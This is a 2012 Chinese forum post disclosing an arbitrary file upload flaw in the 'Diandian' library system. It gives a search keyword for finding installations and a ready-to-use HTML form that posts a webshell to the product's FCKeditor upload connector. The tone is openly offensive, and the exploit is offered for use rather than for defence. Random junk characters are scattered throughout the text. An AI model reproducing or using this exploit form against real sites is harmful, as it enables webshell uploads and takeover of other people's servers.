主题:图书馆系统任意文件上传漏洞
/ [8 z3 g H9 T% V' c 作者:冰锋刺客! E3 u& d" O2 y& |& E0 G; v
厂商:点击书(dianjishu.com)+ X2 w% o% K8 _& `# f# Q3 D1 S
日期:2012-6-21
: d9 t' E6 b' B1 M9 k6 S: q; S
; ~& V& `& B+ f; j- A; II 概述
) q) E. o. ~9 B+ K 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell' d9 l6 G) q# P( I9 F
II 简介8 Z5 L: f `) w# W* _
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
3 k! ~5 `/ v( ^$ L" O; a" i) A 补充一个漏洞
- {& n. p1 K9 b <form id="frmUpload" enctype="multipart/form-data"2 p! Z- i7 c5 e& F
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>! N# H+ q( s9 }$ P8 g0 E
<input id="btnUpload" type="submit" value="操翻他">
- F4 m1 W5 Y$ p7 t5 U </form>
6 f8 ]* R& d5 K; I: u 你们懂的
* b/ ~2 C6 ~) f c$ F+ J2 W 那傻逼提供还需要改包.
! s( Q& J0 ~/ L3 F 自己看了下源代码发现fckeditor
# Q) U, ^, D: C, k, T( q 直接秒杀
5 U9 j5 r, ~" X- ~ |
发表于 2012-9-10 21:20:59
收藏
支持
反对